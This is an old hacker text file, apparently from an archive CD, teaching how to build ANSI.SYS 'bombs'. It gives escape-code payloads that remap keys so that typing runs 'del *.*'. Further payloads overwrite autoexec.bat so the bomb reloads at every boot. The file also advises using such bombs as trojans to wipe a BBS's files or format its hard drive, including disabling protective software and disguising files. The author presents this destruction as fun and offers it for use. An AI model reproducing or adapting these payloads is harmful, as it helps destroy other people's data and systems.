home *** CD-ROM | disk | FTP | other *** search
/ Steal This CD / steal_this_cd.iso / Chapter 04 - ANSI Bombs and Viruses / ansibomb.txt next >
Text File  |  2005-09-30  |  10KB  |  208 lines

  1.                   ANSI Bombs II: Tips and Techniques
  2.  
  3.                                   By
  4.  
  5.                            The Raging Golem
  6.  
  7.  
  8.     I. Introduction
  9.  
  10.     After writing the last file, a lot of people let me know about the
  11. mistakes I had made.  I guess this file is to clear up those miscon
  12. ceptions and to let people know about some of the little tricks behind
  13. ANSI bombing.  Of course, ANSI bombing isn't as dangerous as a lot of
  14. people make it out to be, but bombs are still fun to make and with a
  15. little planning deliver some degree of success.  ANSI bombing can
  16. be dangerous, so I am tired of hearing people say that an ANSI bomb is
  17. harmless, another misconception I hope to clear up.  Now, most people
  18. that have spent time experimenting with ANSI bombs probably know most
  19. of the material in this file, but it might be fun just to read anyway.
  20.  
  21.     2. Misconceptions
  22.  
  23.     In my last file, I made three major blunders, or what I would con
  24. sider to be major blunders.  First, I said that ANSI bombs could be
  25. used on BBSs to screw people over, but I guess I was wrong.  It was
  26. pure speculation on what other people had said that made me say that.
  27. ANSI codes, including those that redefine keys, are sent over the
  28. lines, but most comm programs don't use ANSI.SYS; they use their own
  29. version of ANSI, which doesn't support key redefinition.  Some people
  30. might have a program that supports it, but I haven't seen it yet.  I
  31. have tested bombs on systems on my own and proved to myself that they
  32. don't work.  I have also seen people fuck up bombs that would have
  33. worked by uploading them in a message.  The second misconception is
  34. that ANSI bombs are dangerous when put into zips.  I haven't really
  35. tested this out much, but from what I hear with the newer versions of
  36. PKZIP, you have to specify that you want to see ANSI comments when
  37. unzipping.  It is unlikely that you would waste your time unzipping
  38. something again after seeing "Format C:" in the middle of an escape
  39. code.  I could be mistaken, but I'm pretty sure that I'm right. Third,
  40. the last thing that was a misconception is that VANSI.SYS will protect
  41. your system from key redefinition.  Maybe the newer versions don't
  42. support key redefinition, but mine sure as hell does.  There are pro
  43. grams out there that don't support it, but I don't know any of the
  44. names.  Of course, if I were you, I would be wary about using some
  45. thing other then ANSI.  I have a few friends that are working on "A
  46. Better ANSI" for PDers, which, instead of being better, really screws
  47. them over.
  48.  
  49.     3. An Overview
  50.  
  51.     Now, in case you haven't read my other file (it's called ANSI.DOC,
  52. kind of lame but fairly informative), I'll briefly go over the struc
  53. ture of an ANSI bomb.  Skip this part if you know what an ANSI bomb is
  54. and how to make one.
  55.     In ANSI everything is done with a system of escape codes.  Key
  56. redefinition is one of those codes.  (From now, whenever I say ESC, I
  57. really mean the arrow, ).  Here is a basic command:
  58.                           ESC [13;27p
  59.     This would make the <Enter> key (13 is the code for enter) turn
  60. into the <Escape> key (27 is the code for escape).  The  always has to
  61. be there, as do the bracket and the "p", but what is between the
  62. bracket and the "p" is up to you.  The first number is always the key
  63. that you want to be redefined.  If there is a zero for the first num
  64. ber, that means the key is in the extended set, and therefore, the
  65. first two numbers are the code.  The bracket signifies the beginning
  66. of the definition, and the "p" signifies the end.  Whenever you want a
  67. key pressed, you have to use it's numerical code (i.e. 13 is the code
  68. for <Enter>).  You can't redefine strings, but you can redefine a key
  69. to become a string (i.e. ESC [13;"Blah"p would make <Enter> say
  70. "Blah").  Strings must be inside of quotes, which includes commands
  71. that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p
  72. would delete everything in the directory, note that 13 stands for
  73. Enter in this case, not the redefinition).  An escape code can have
  74. as many commands as you want in it, but each one has to be separated
  75. by a semi-colon.  You can only redefine one key in each escape code,
  76. so if you want to redefine another key, you have to start another
  77. escape code.  That's about it when it comes to bombs, now that you
  78. have the basics, all you really need is a little imagination.
  79.  
  80.     4. Tips and Tricks
  81.  
  82.     A. The Y/N Redefinition
  83.  
  84.     Now, here's a simple but fun little ANSI bomb:
  85.  
  86.                    ESC [78;89;13p ESC [110;121;13p
  87.  
  88.     Basically, all this does is turn a capital "N" into "Y" and a
  89. lower-case "n" into "y".  Alone this doesn't do too much, except for
  90. screw around with what they are typing.  On the other hand, try adding
  91. this line of code to the ANSI bomb:
  92.  
  93.                    ESC [13;27;13;"del *.*";13p
  94.  
  95.     Most people would automatically press "N" when they see "Del *.*",
  96. but when they do, they will be screwed over.  This portion of a bomb
  97. is very useful when it comes to making good bombs.
  98.  
  99.     B. Screwing with the Autoexec.bat
  100.  
  101.     Here is another line of code that you may find useful in future
  102. bombing projects:
  103.  
  104.                    ESC [13;27;13;"copy bomb.ans c:\";13;"copy con
  105.                      c:\autoexec.bat";13;"type bomb.ans";13;0;109;
  106.                      13;"cls";13p
  107.  
  108.     This line of code makes the bomb a little more permanent and a
  109. little more dangerous.  It copies the bomb into the root directory,
  110. then it change/creates the autoexec.bat, so the bomb is typed after
  111. every boot-up.  Of course, the person could just boot off a disk, but
  112. I'm sure this would get them a few time.  It could also probably
  113. appear as though it were a virus, scaring the shit out of the owner of
  114. the computer.
  115.  
  116.     C. Turning Commands into Other Commands
  117.  
  118.     One of the best pranks to do to someone using an ANSI bomb is to
  119. redefine commands.  That way if they type in "copy", it will turn into
  120. "Del *.*".  Since you can't actually change the whole string, you have
  121. to take a different approach.  You have to change a few of the keys,
  122. so when typed, they type and execute the desired command.  I guess it
  123. would be coolest to have to command exactly the same length; that way
  124. you could redefine one key at a time to obtain the desired effect.
  125. It doesn't really matter how you do it, just as long as it works.  You
  126. might make an ANSI that says "Wow, check out what this bomb did to
  127. your directory", and then have it redefine the keys, so when they type
  128. in "dir", it turns into "del".  I think you get the idea.
  129.  
  130.     D. Trojans
  131.  
  132.     By now, everybody knows what a Trojan is.  You probably wouldn't
  133. think so, but ANSI bombs can be used as Trojans and in Trojans. First,
  134. if you are planning on crashing a board, but you're not very good at
  135. programming, then make yourself an ANSI bomb.  Try to find out in
  136. which directory the main files for running the BBS are stored. They
  137. are usually under the name BBS or the name of the software, like WWIV
  138. or Telegard.  Then, make a bomb that either just deletes all the files
  139. in that directory, or if you want the board to be down a longer time,
  140. then make one that formats the Hard Drive.  In this form ANSI bombs,
  141. if they are well planned out, can be easy to make Trojans. Second,
  142. ANSI bombs can used in Trojans.  This is probably stretching it a
  143. little, but say you wanted to write a Trojan that would delete a
  144. directory, every time you typed a certain key, then you could use an
  145. ANSI bomb.  First make some batch and com/exe files that would search
  146. for protecting programs like Norton and turn them off.  Then you could
  147. copy the file into the root directory, along with your versions of
  148. autoexec.bat, config.sys, ANSI.sys, and whatever else.  (To make it
  149. look more realistic make the files Resource.00x to trick the user,
  150. then when copying, use the real name).  Then somehow lock the computer
  151. up or do a warm boot through some pd program, which is easily attain
  152. able.  When the computer loads back up, you can screw that shit out of
  153. them with your ANSI bomb.
  154.  
  155.     5. Conclusion
  156.     It would seem to some people that ANSI bombs are very dangerous,
  157. and to others that they are stupid or lame.  Personally, I think that
  158. ANSI bombs are just plain old fun.  They're not too hard to make, but
  159. there is a lot that you can do with them.  They are nowhere near as
  160. malicious as virii, so if you're looking for unstoppable destruction,
  161. look elsewhere, but they do serve their purpose.  I know that there
  162. are programs out there that help you program ANSI bombs, but I think
  163. that they kind of take the fun out of them.  Probably, some day soon,
  164. I'll quit making ANSI bombs and start looking more into virii and pure
  165. Trojans.  But for now, ANSI bombs suit my purpose.
  166.  
  167.                                -TRG
  168.  
  169.     Appendix A: Key Code Program
  170.  
  171.     Here is a small program, which I find very helpful.  After loading
  172. it up, it tells you the numeric code for every key you type in.  Spe
  173. cial means that it is in the extended set and therefore uses zero, and
  174. "q" ends the program.  Unfortunately,  I can't take any credit for
  175. this program.  I got it over the phone from Heavymetl, and it was made
  176. by his brother.  So many thanks go out to Heavymetl and his brother,
  177. even though they'll probably be a little pissed at me for including
  178. this in my file.  It is in Pascal and can be compiled in most Turbo
  179. Pascal compilers.
  180.  
  181.     Use CRT;
  182.     Var
  183.       CH : CHAR;
  184.     Begin
  185.       Repeat
  186.         CH := ReadKey;
  187.         If CH = #0 then
  188.           Begin
  189.             CH := ReadKey;
  190.             WriteLn(CH,'(Special) - ',ORD(CH));
  191.           End
  192.         Else
  193.           WriteLn(CH,' - ',ORD(CH));
  194.       Until
  195.         CH = 'q';
  196.     End.
  197.  
  198.     Thanks go out to:
  199.  
  200.     Heavymetl and his brother for the program and ideas.  Weapons
  201. Master for the input and the help he has given me.  Everybody else who
  202. has helped me out; you know who you are, or at least, you think you
  203. know who you are.  Most of all, to those brave soldiers risking their
  204. asses everyday for us half-way across the world in Saudi Arabia.  Your
  205. deeds haven't gone unnoticed, of course that's mainly because that's
  206. all the news ever shows nowadays.  Also, to anybody else I might have
  207. forgotten.  Thanks.
  208.